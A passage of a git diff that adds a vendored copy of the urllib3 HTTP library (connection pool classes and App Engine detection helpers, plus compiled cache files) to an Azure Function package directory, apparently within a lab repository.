.util.proxy import connection_requires_http_tunnel +from .util.queue import LifoQueue +from .util.request import set_file_position +from .util.response import assert_header_parsing +from .util.retry import Retry +from .util.ssl_match_hostname import CertificateError +from .util.timeout import Timeout +from .util.url import Url, _encode_target +from .util.url import _normalize_host as normalize_host +from .util.url import get_host, parse_url + +xrange = six.moves.xrange + +log = logging.getLogger(__name__) + +_Default = object() + + +# Pool objects +class ConnectionPool(object): + """ + Base class for all connection pools, such as + :class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`. + + .. note:: + ConnectionPool.urlopen() does not normalize or percent-encode target URIs + which is useful if your target server doesn't support percent-encoded + target URIs. + """ + + scheme = None + QueueCls = LifoQueue + + def __init__(self, host, port=None): + if not host: + raise LocationValueError("No host specified.") + + self.host = _normalize_host(host, scheme=self.scheme) + self._proxy_host = host.lower() + self.port = port + + def __str__(self): + return "%s(host=%r, port=%r)" % (type(self).__name__, self.host, self.port) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.close() + # Return False to re-raise any potential exceptions + return False + + def close(self): + """ + Close all pooled connections and disable the pool. + """ + pass + + +# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252 +_blocking_errnos = {errno.EAGAIN, errno.EWOULDBLOCK} + + +class HTTPConnectionPool(ConnectionPool, RequestMethods): + """ + Thread-safe connection pool for one host. + + :param host: + Host used for this HTTP Connection (e.g. "localhost"), passed into + :class:`http.client.HTTPConnection`. + + :param port: + Port used for this HTTP Connection (None is equivalent to 80), passed + into :class:`http.client.HTTPConnection`. + + :param strict: + Causes BadStatusLine to be raised if the status line can't be parsed + as a valid HTTP/1.0 or 1.1 status line, passed into + :class:`http.client.HTTPConnection`. + + .. note:: + Only works in Python 2. This parameter is ignored in Python 3. + + :param timeout: + Socket timeout in seconds for each individual connection. This can + be a float or integer, which sets the timeout for the HTTP request, + or an instance of :class:`urllib3.util.Timeout` which gives you more + fine-grained control over request timeouts. After the constructor has + been parsed, this is always a `urllib3.util.Timeout` object. + + :param maxsize: + Number of connections to save that can be reused. More than 1 is useful + in multithreaded situations. If ``block`` is set to False, more + connections will be created but they will not be saved once they've + been used. + + :param block: + If set to True, no more than ``maxsize`` connections will be used at + a time. When no free connections are available, the call will block + until a connection has been released. This is a useful side effect for + particular multithreaded situations where one does not want to use more + than maxsize connections per host to prevent flooding. + + :param headers: + Headers to include with all requests, unless other headers are given + explicitly. + + :param retries: + Retry configuration to use by default with requests in this pool. + + :param _proxy: + Parsed proxy URL, should not be used directly, instead, see + :class:`urllib3.ProxyManager` + + :param _proxy_headers: + A dictionary with proxy headers, should not be used directly, + instead, see :class:`urllib3.ProxyManager` + + :param \\**conn_kw: + Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`, + :class:`urllib3.connection.HTTPSConnection` instances. + """ + + scheme = "http" + ConnectionCls = HTTPConnection + ResponseCls = HTTPResponse + + def __init__( + self, + host, + port=None, + strict=False, + timeout=Timeout.DEFAULT_TIMEOUT, + maxsize=1, + block=False, + headers=None, + retries=None, + _proxy=None, + _proxy_headers=None, + _proxy_config=None, + **conn_kw + ): + ConnectionPool.__init__(self, host, port) + RequestMethods.__init__(self, headers) + + self.strict = strict + + if not isinstance(timeout, Timeout): + timeout = Timeout.from_float(timeout) + + if retries is None: + retries = Retry.DEFAULT + + self.timeout = timeout + self.retries = retries + + self.pool = self.QueueCls(maxsize) + self.block = block + + self.proxy = _proxy + self.proxy_headers = _proxy_headers or {} + self.proxy_config = _proxy_config + + # Fill the queue up so that doing get() on it will block properly + for _ in xrange(maxsize): + self.pool.put(None) + + # These are mostly for testing and debugging purposes. + self.num_connections = 0 + self.num_requests = 0 + self.conn_kw = conn_kw + + if self.proxy: + # Enable Nagle's algorithm for proxies, to avoid packet fragmentation. + # We cannot know if the user has added default socket options, so we cannot replace the + # list. + self.conn_kw.setdefault("socket_options", []) + + self.conn_kw["proxy"] = self.proxy + self.conn_kw["proxy_config"] = self.proxy_config + + def _new_conn(self): + """ + Return a fresh :class:`HTTPConnection`. + """ + self.num_connections += 1 + log.debug( + "Starting new HTTP connection (%d): %s:%s", + self.num_connections, + self.host, + self.port or "80", + ) + + conn = self.ConnectionCls( + host=self.host, + port=self.port, + timeout=self.timeout.connect_timeout, + strict=self.strict, + **self.conn_kw + ) + return conn + + def _get_conn(self, timeout=None): + """ + Get a connection. Will return a pooled connection if one is available. + + If no connections are available and :prop:`.block` is ``False``, then a + fresh connection is returned. + + :param timeout: + Seconds to wait before giving up and raising + :class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and + :prop:`.block` is ``True``. + """ + conn = None + try: + conn = self.pool.get(block=self.block, timeout=timeout) + + except AttributeError: # self.pool is None + raise ClosedPoolError(self, "Pool is closed.") + + except queue.Empty: + if self.block: + raise EmptyPoolError( + self, + "Pool reached maximum size and no more connections are allowed.", + ) + pass # Oh well, we'll create a new connection then + + # If this is a persistent connection, check if it got disconnected + if conn and is_connection_dropped(conn): + log.debug("Resetting dropped connection: %s", self.host) + conn.close() + if getattr(conn, "auto_open", 1) == 0: + # This is a proxied connection that has been mutated by + # http.client._tunnel() and cannot be reused (since it would + # attempt to bypass the proxy) + conn = None + + return conn or self._new_conn() + + def _put_conn(self, conn): + """ + Put a connection back into the pool. + + :param conn: + Connection object for the current host and port as returned by + :meth:`._new_conn` or :meth:`._get_conn`. + + If the pool is already full, the connection is closed and discarded + because we exceeded maxsize. If connections are discarded frequently, + then maxsize should be increased. + + If the pool is closed, then the connection will be closed and discarded. + """ + try: + self.pool.put(conn, block=False) + return # Everything is dandy, done. + except AttributeError: + # self.pool is None. + pass + except queue.Full: + # This should never happen if self.block == True + log.warning( + "Connection pool is full, discarding connection: %s. Connection pool size: %s", + self.host, + self.pool.qsize(), + ) + # Connection never got put back into the pool, close it. + if conn: + conn.close() + + def _validate_conn(self, conn): + """ + Called right before a request is made, after the socket is created. + """ + pass + + def _prepare_proxy(self, conn): + # Nothing to do for HTTP connections. + pass + + def _get_timeout(self, timeout): + """Helper that always returns a :class:`urllib3.util.Timeout`""" + if timeout is _Default: + return self.timeout.clone() + + if isinstance(timeout, Timeout): + return timeout.clone() + else: + # User passed us an int/float. This is for backwards compatibility, + # can be removed later + return Timeout.from_float(timeout) + + def _raise_timeout(self, err, url, timeout_value): + """Is the error actually a timeout? Will raise a ReadTimeout or pass""" + + if isinstance(err, SocketTimeout): + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % timeout_value + ) + + # See the above comment about EAGAIN in Python 3. In Python 2 we have + # to specifically catch it and throw the timeout error + if hasattr(err, "errno") and err.errno in _blocking_errnos: + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % timeout_value + ) + + # Catch possible read timeouts thrown as SSL errors. If not the + # case, rethrow the original. We need to do this because of: + # http://bugs.python.org/issue10272 + if "timed out" in str(err) or "did not complete (read)" in str( + err + ): # Python < 2.7.4 + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % timeout_value + ) + + def _make_request( + self, conn, method, url, timeout=_Default, chunked=False, **httplib_request_kw + ): + """ + Perform a request on a given urllib connection object taken from our + pool. + + :param conn: + a connection from one of our connection pools + + :param timeout: + Socket timeout in seconds for the request. This can be a + float or integer, which will set the same timeout value for + the socket connect and the socket read, or an instance of + :class:`urllib3.util.Timeout`, which gives you more fine-grained + control over your timeouts. + """ + self.num_requests += 1 + + timeout_obj = self._get_timeout(timeout) + timeout_obj.start_connect() + conn.timeout = timeout_obj.connect_timeout + + # Trigger any extra validation we need to do. + try: + self._validate_conn(conn) + except (SocketTimeout, BaseSSLError) as e: + # Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout. + self._raise_timeout(err=e, url=url, timeout_value=conn.timeout) + raise + + # conn.request() calls http.client.*.request, not the method in + # urllib3.request. It also calls makefile (recv) on the socket. + try: + if chunked: + conn.request_chunked(method, url, **httplib_request_kw) + else: + conn.request(method, url, **httplib_request_kw) + + # We are swallowing BrokenPipeError (errno.EPIPE) since the server is + # legitimately able to close the connection after sending a valid response. + # With this behaviour, the received response is still readable. + except BrokenPipeError: + # Python 3 + pass + except IOError as e: + # Python 2 and macOS/Linux + # EPIPE and ESHUTDOWN are BrokenPipeError on Python 2, and EPROTOTYPE is needed on macOS + # https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/ + if e.errno not in { + errno.EPIPE, + errno.ESHUTDOWN, + errno.EPROTOTYPE, + }: + raise + + # Reset the timeout for the recv() on the socket + read_timeout = timeout_obj.read_timeout + + # App Engine doesn't have a sock attr + if getattr(conn, "sock", None): + # In Python 3 socket.py will catch EAGAIN and return None when you + # try and read into the file pointer created by http.client, which + # instead raises a BadStatusLine exception. Instead of catching + # the exception and assuming all BadStatusLine exceptions are read + # timeouts, check for a zero timeout before making the request. + if read_timeout == 0: + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % read_timeout + ) + if read_timeout is Timeout.DEFAULT_TIMEOUT: + conn.sock.settimeout(socket.getdefaulttimeout()) + else: # None or a value + conn.sock.settimeout(read_timeout) + + # Receive the response from the server + try: + try: + # Python 2.7, use buffering of HTTP responses + httplib_response = conn.getresponse(buffering=True) + except TypeError: + # Python 3 + try: + httplib_response = conn.getresponse() + except BaseException as e: + # Remove the TypeError from the exception chain in + # Python 3 (including for exceptions like SystemExit). + # Otherwise it looks like a bug in the code. + six.raise_from(e, None) + except (SocketTimeout, BaseSSLError, SocketError) as e: + self._raise_timeout(err=e, url=url, timeout_value=read_timeout) + raise + + # AppEngine doesn't have a version attr. + http_version = getattr(conn, "_http_vsn_str", "HTTP/?") + log.debug( + '%s://%s:%s "%s %s %s" %s %s', + self.scheme, + self.host, + self.port, + method, + url, + http_version, + httplib_response.status, + httplib_response.length, + ) + + try: + assert_header_parsing(httplib_response.msg) + except (HeaderParsingError, TypeError) as hpe: # Platform-specific: Python 3 + log.warning( + "Failed to parse headers (url=%s): %s", + self._absolute_url(url), + hpe, + exc_info=True, + ) + + return httplib_response + + def _absolute_url(self, path): + return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url + + def close(self): + """ + Close all pooled connections and disable the pool. + """ + if self.pool is None: + return + # Disable access to the pool + old_pool, self.pool = self.pool, None + + try: + while True: + conn = old_pool.get(block=False) + if conn: + conn.close() + + except queue.Empty: + pass # Done. + + def is_same_host(self, url): + """ + Check if the given ``url`` is a member of the same host as this + connection pool. + """ + if url.startswith("/"): + return True + + # TODO: Add optional support for socket.gethostbyname checking. + scheme, host, port = get_host(url) + if host is not None: + host = _normalize_host(host, scheme=scheme) + + # Use explicit default port for comparison when none is given + if self.port and not port: + port = port_by_scheme.get(scheme) + elif not self.port and port == port_by_scheme.get(scheme): + port = None + + return (scheme, host, port) == (self.scheme, self.host, self.port) + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=None, + redirect=True, + assert_same_host=True, + timeout=_Default, + pool_timeout=None, + release_conn=None, + chunked=False, + body_pos=None, + **response_kw + ): + """ + Get a connection from the pool and perform an HTTP request. This is the + lowest level call for making a request, so you'll need to specify all + the raw details. + + .. note:: + + More commonly, it's appropriate to use a convenience method provided + by :class:`.RequestMethods`, such as :meth:`request`. + + .. note:: + + `release_conn` will only behave as expected if + `preload_content=False` because we want to make + `preload_content=False` the default behaviour someday soon without + breaking backwards compatibility. + + :param method: + HTTP request method (such as GET, POST, PUT, etc.) + + :param url: + The URL to perform the request on. + + :param body: + Data to send in the request body, either :class:`str`, :class:`bytes`, + an iterable of :class:`str`/:class:`bytes`, or a file-like object. + + :param headers: + Dictionary of custom headers to send, such as User-Agent, + If-None-Match, etc. If None, pool headers are used. If provided, + these headers completely replace any pool-specific headers. + + :param retries: + Configure the number of retries to allow before raising a + :class:`~urllib3.exceptions.MaxRetryError` exception. + + Pass ``None`` to retry until you receive a response. Pass a + :class:`~urllib3.util.retry.Retry` object for fine-grained control + over different types of retries. + Pass an integer number to retry connection errors that many times, + but no other types of errors. Pass zero to never retry. + + If ``False``, then retries are disabled and any exception is raised + immediately. Also, instead of raising a MaxRetryError on redirects, + the redirect response will be returned. + + :type retries: :class:`~urllib3.util.retry.Retry`, False, or an int. + + :param redirect: + If True, automatically handle redirects (status codes 301, 302, + 303, 307, 308). Each redirect counts as a retry. Disabling retries + will disable redirect, too. + + :param assert_same_host: + If ``True``, will make sure that the host of the pool requests is + consistent else will raise HostChangedError. When ``False``, you can + use the pool on an HTTP proxy and request foreign hosts. + + :param timeout: + If specified, overrides the default timeout for this one + request. It may be a float (in seconds) or an instance of + :class:`urllib3.util.Timeout`. + + :param pool_timeout: + If set and the pool is set to block=True, then this method will + block for ``pool_timeout`` seconds and raise EmptyPoolError if no + connection is available within the time period. + + :param release_conn: + If False, then the urlopen call will not release the connection + back into the pool once a response is received (but will release if + you read the entire contents of the response such as when + `preload_content=True`). This is useful if you're not preloading + the response's content immediately. You will need to call + ``r.release_conn()`` on the response ``r`` to return the connection + back into the pool. If None, it takes the value of + ``response_kw.get('preload_content', True)``. + + :param chunked: + If True, urllib3 will send the body using chunked transfer + encoding. Otherwise, urllib3 will send the body using the standard + content-length form. Defaults to False. + + :param int body_pos: + Position to seek to in file-like body in the event of a retry or + redirect. Typically this won't need to be set because urllib3 will + auto-populate the value when needed. + + :param \\**response_kw: + Additional parameters are passed to + :meth:`urllib3.response.HTTPResponse.from_httplib` + """ + + parsed_url = parse_url(url) + destination_scheme = parsed_url.scheme + + if headers is None: + headers = self.headers + + if not isinstance(retries, Retry): + retries = Retry.from_int(retries, redirect=redirect, default=self.retries) + + if release_conn is None: + release_conn = response_kw.get("preload_content", True) + + # Check host + if assert_same_host and not self.is_same_host(url): + raise HostChangedError(self, url, retries) + + # Ensure that the URL we're connecting to is properly encoded + if url.startswith("/"): + url = six.ensure_str(_encode_target(url)) + else: + url = six.ensure_str(parsed_url.url) + + conn = None + + # Track whether `conn` needs to be released before + # returning/raising/recursing. Update this variable if necessary, and + # leave `release_conn` constant throughout the function. That way, if + # the function recurses, the original value of `release_conn` will be + # passed down into the recursive call, and its value will be respected. + # + # See issue #651 [1] for details. + # + # [1] + release_this_conn = release_conn + + http_tunnel_required = connection_requires_http_tunnel( + self.proxy, self.proxy_config, destination_scheme + ) + + # Merge the proxy headers. Only done when not using HTTP CONNECT. We + # have to copy the headers dict so we can safely change it without those + # changes being reflected in anyone else's copy. + if not http_tunnel_required: + headers = headers.copy() + headers.update(self.proxy_headers) + + # Must keep the exception bound to a separate variable or else Python 3 + # complains about UnboundLocalError. + err = None + + # Keep track of whether we cleanly exited the except block. This + # ensures we do proper cleanup in finally. + clean_exit = False + + # Rewind body position, if needed. Record current position + # for future rewinds in the event of a redirect/retry. + body_pos = set_file_position(body, body_pos) + + try: + # Request a connection from the queue. + timeout_obj = self._get_timeout(timeout) + conn = self._get_conn(timeout=pool_timeout) + + conn.timeout = timeout_obj.connect_timeout + + is_new_proxy_conn = self.proxy is not None and not getattr( + conn, "sock", None + ) + if is_new_proxy_conn and http_tunnel_required: + self._prepare_proxy(conn) + + # Make the request on the httplib connection object. + httplib_response = self._make_request( + conn, + method, + url, + timeout=timeout_obj, + body=body, + headers=headers, + chunked=chunked, + ) + + # If we're going to release the connection in ``finally:``, then + # the response doesn't need to know about the connection. Otherwise + # it will also try to release it and we'll have a double-release + # mess. + response_conn = conn if not release_conn else None + + # Pass method to Response for length checking + response_kw["request_method"] = method + + # Import httplib's response into our own wrapper object + response = self.ResponseCls.from_httplib( + httplib_response, + pool=self, + connection=response_conn, + retries=retries, + **response_kw + ) + + # Everything went great! + clean_exit = True + + except EmptyPoolError: + # Didn't get a connection from the pool, no need to clean up + clean_exit = True + release_this_conn = False + raise + + except ( + TimeoutError, + HTTPException, + SocketError, + ProtocolError, + BaseSSLError, + SSLError, + CertificateError, + ) as e: + # Discard the connection for these exceptions. It will be + # replaced during the next _get_conn() call. + clean_exit = False + + def _is_ssl_error_message_from_http_proxy(ssl_error): + # We're trying to detect the message 'WRONG_VERSION_NUMBER' but + # SSLErrors are kinda all over the place when it comes to the message, + # so we try to cover our bases here! + message = " ".join(re.split("[^a-z]", str(ssl_error).lower())) + return ( + "wrong version number" in message or "unknown protocol" in message + ) + + # Try to detect a common user error with proxies which is to + # set an HTTP proxy to be HTTPS when it should be 'http://' + # (ie {'http': 'http://proxy', 'https': 'https://proxy'}) + # Instead we add a nice error message and point to a URL. + if ( + isinstance(e, BaseSSLError) + and self.proxy + and _is_ssl_error_message_from_http_proxy(e) + ): + e = ProxyError( + "Your proxy appears to only use HTTP and not HTTPS, " + "try changing your proxy URL to be HTTP. See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#https-proxy-error-http-proxy", + SSLError(e), + ) + elif isinstance(e, (BaseSSLError, CertificateError)): + e = SSLError(e) + elif isinstance(e, (SocketError, NewConnectionError)) and self.proxy: + e = ProxyError("Cannot connect to proxy.", e) + elif isinstance(e, (SocketError, HTTPException)): + e = ProtocolError("Connection aborted.", e) + + retries = retries.increment( + method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2] + ) + retries.sleep() + + # Keep track of the error for the retry warning. + err = e + + finally: + if not clean_exit: + # We hit some kind of exception, handled or otherwise. We need + # to throw the connection away unless explicitly told not to. + # Close the connection, set the variable to None, and make sure + # we put the None back in the pool to avoid leaking it. + conn = conn and conn.close() + release_this_conn = True + + if release_this_conn: + # Put the connection back to be reused. If the connection is + # expired then it will be None, which will get replaced with a + # fresh connection during _get_conn. + self._put_conn(conn) + + if not conn: + # Try again + log.warning( + "Retrying (%r) after connection broken by '%r': %s", retries, err, url + ) + return self.urlopen( + method, + url, + body, + headers, + retries, + redirect, + assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + # Handle redirect? + redirect_location = redirect and response.get_redirect_location() + if redirect_location: + if response.status == 303: + method = "GET" + + try: + retries = retries.increment(method, url, response=response, _pool=self) + except MaxRetryError: + if retries.raise_on_redirect: + response.drain_conn() + raise + return response + + response.drain_conn() + retries.sleep_for_retry(response) + log.debug("Redirecting %s -> %s", url, redirect_location) + return self.urlopen( + method, + redirect_location, + body, + headers, + retries=retries, + redirect=redirect, + assert_same_host=assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + # Check if we should retry the HTTP response. + has_retry_after = bool(response.getheader("Retry-After")) + if retries.is_retry(method, response.status, has_retry_after): + try: + retries = retries.increment(method, url, response=response, _pool=self) + except MaxRetryError: + if retries.raise_on_status: + response.drain_conn() + raise + return response + + response.drain_conn() + retries.sleep(response) + log.debug("Retry: %s", url) + return self.urlopen( + method, + url, + body, + headers, + retries=retries, + redirect=redirect, + assert_same_host=assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + return response + + +class HTTPSConnectionPool(HTTPConnectionPool): + """ + Same as :class:`.HTTPConnectionPool`, but HTTPS. + + :class:`.HTTPSConnection` uses one of ``assert_fingerprint``, + ``assert_hostname`` and ``host`` in this order to verify connections. + If ``assert_hostname`` is False, no verification is done. + + The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``, + ``ca_cert_dir``, ``ssl_version``, ``key_password`` are only used if :mod:`ssl` + is available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade + the connection socket into an SSL socket. + """ + + scheme = "https" + ConnectionCls = HTTPSConnection + + def __init__( + self, + host, + port=None, + strict=False, + timeout=Timeout.DEFAULT_TIMEOUT, + maxsize=1, + block=False, + headers=None, + retries=None, + _proxy=None, + _proxy_headers=None, + key_file=None, + cert_file=None, + cert_reqs=None, + key_password=None, + ca_certs=None, + ssl_version=None, + assert_hostname=None, + assert_fingerprint=None, + ca_cert_dir=None, + **conn_kw + ): + + HTTPConnectionPool.__init__( + self, + host, + port, + strict, + timeout, + maxsize, + block, + headers, + retries, + _proxy, + _proxy_headers, + **conn_kw + ) + + self.key_file = key_file + self.cert_file = cert_file + self.cert_reqs = cert_reqs + self.key_password = key_password + self.ca_certs = ca_certs + self.ca_cert_dir = ca_cert_dir + self.ssl_version = ssl_version + self.assert_hostname = assert_hostname + self.assert_fingerprint = assert_fingerprint + + def _prepare_conn(self, conn): + """ + Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket` + and establish the tunnel if proxy is used. + """ + + if isinstance(conn, VerifiedHTTPSConnection): + conn.set_cert( + key_file=self.key_file, + key_password=self.key_password, + cert_file=self.cert_file, + cert_reqs=self.cert_reqs, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + assert_hostname=self.assert_hostname, + assert_fingerprint=self.assert_fingerprint, + ) + conn.ssl_version = self.ssl_version + return conn + + def _prepare_proxy(self, conn): + """ + Establishes a tunnel connection through HTTP CONNECT. + + Tunnel connection is established early because otherwise httplib would + improperly set Host: header to proxy's IP:port. + """ + + conn.set_tunnel(self._proxy_host, self.port, self.proxy_headers) + + if self.proxy.scheme == "https": + conn.tls_in_tls_required = True + + conn.connect() + + def _new_conn(self): + """ + Return a fresh :class:`http.client.HTTPSConnection`. + """ + self.num_connections += 1 + log.debug( + "Starting new HTTPS connection (%d): %s:%s", + self.num_connections, + self.host, + self.port or "443", + ) + + if not self.ConnectionCls or self.ConnectionCls is DummyConnection: + raise SSLError( + "Can't connect to HTTPS URL because the SSL module is not available." + ) + + actual_host = self.host + actual_port = self.port + if self.proxy is not None: + actual_host = self.proxy.host + actual_port = self.proxy.port + + conn = self.ConnectionCls( + host=actual_host, + port=actual_port, + timeout=self.timeout.connect_timeout, + strict=self.strict, + cert_file=self.cert_file, + key_file=self.key_file, + key_password=self.key_password, + **self.conn_kw + ) + + return self._prepare_conn(conn) + + def _validate_conn(self, conn): + """ + Called right before a request is made, after the socket is created. + """ + super(HTTPSConnectionPool, self)._validate_conn(conn) + + # Force connect early to allow us to validate the connection. + if not getattr(conn, "sock", None): # AppEngine might not have `.sock` + conn.connect() + + if not conn.is_verified: + warnings.warn( + ( + "Unverified HTTPS request is being made to host '%s'. " + "Adding certificate verification is strongly advised. See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings" % conn.host + ), + InsecureRequestWarning, + ) + + if getattr(conn, "proxy_is_verified", None) is False: + warnings.warn( + ( + "Unverified HTTPS connection done to an HTTPS proxy. " + "Adding certificate verification is strongly advised. See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings" + ), + InsecureRequestWarning, + ) + + +def connection_from_url(url, **kw): + """ + Given a url, return an :class:`.ConnectionPool` instance of its host. + + This is a shortcut for not having to parse out the scheme, host, and port + of the url before creating an :class:`.ConnectionPool` instance. + + :param url: + Absolute URL string that must include the scheme. Port is optional. + + :param \\**kw: + Passes additional parameters to the constructor of the appropriate + :class:`.ConnectionPool`. Useful for specifying things like + timeout, maxsize, headers, etc. + + Example:: + + >>> conn = connection_from_url('http://google.com/') + >>> r = conn.request('GET', '/') + """ + scheme, host, port = get_host(url) + port = port or port_by_scheme.get(scheme, 80) + if scheme == "https": + return HTTPSConnectionPool(host, port=port, **kw) + else: + return HTTPConnectionPool(host, port=port, **kw) + + +def _normalize_host(host, scheme): + """ + Normalize hosts for comparisons and use with sockets. + """ + + host = normalize_host(host, scheme) + + # httplib doesn't like it when we include brackets in IPv6 addresses + # Specifically, if we include brackets but also pass the port then + # httplib crazily doubles up the square brackets on the Host header. + # Instead, we need to make sure we never pass ``None`` as the port. + # However, for backward compatibility reasons we can't actually + # *assert* that. See http://bugs.python.org/issue28539 + if host.startswith("[") and host.endswith("]"): + host = host[1:-1] + return host diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1189735 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc new file mode 100644 index 0000000..d9bcb2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc new file mode 100644 index 0000000..6f7b5b3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc new file mode 100644 index 0000000..0500dde Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc new file mode 100644 index 0000000..a9d5093 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc new file mode 100644 index 0000000..662e8e3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc new file mode 100644 index 0000000..d2b101c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py new file mode 100644 index 0000000..453d62d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py @@ -0,0 +1,36 @@ +""" +This module provides means to detect the App Engine environment. +""" + +import os + + +def is_appengine(): + return is_local_appengine() or is_prod_appengine() + + +def is_appengine_sandbox(): + """Reports if the app is running in the first generation sandbox. + + The second generation runtimes are technically still in a sandbox, but it + is much less restrictive, so generally you shouldn't need to check for it. + see https://cloud.google.com/appengine/docs/standard/runtimes + """ + return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" + + +def is_local_appengine(): + return "APPENGINE_RUNTIME" in os.environ and os.environ.get( + "SERVER_SOFTWARE", "" + ).startswith("Development/") + + +def is_prod_appengine(): + return "APPENGINE_RUNTIME" in os.environ and os.environ.get( + "SERVER_SOFTWARE", "" + ).startswith("Google App Engine/") + + +def is_prod_appengine_mvms(): + """Deprecated.""" + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..156e778 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc new file mode 100644 index 0000000..0773814 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc 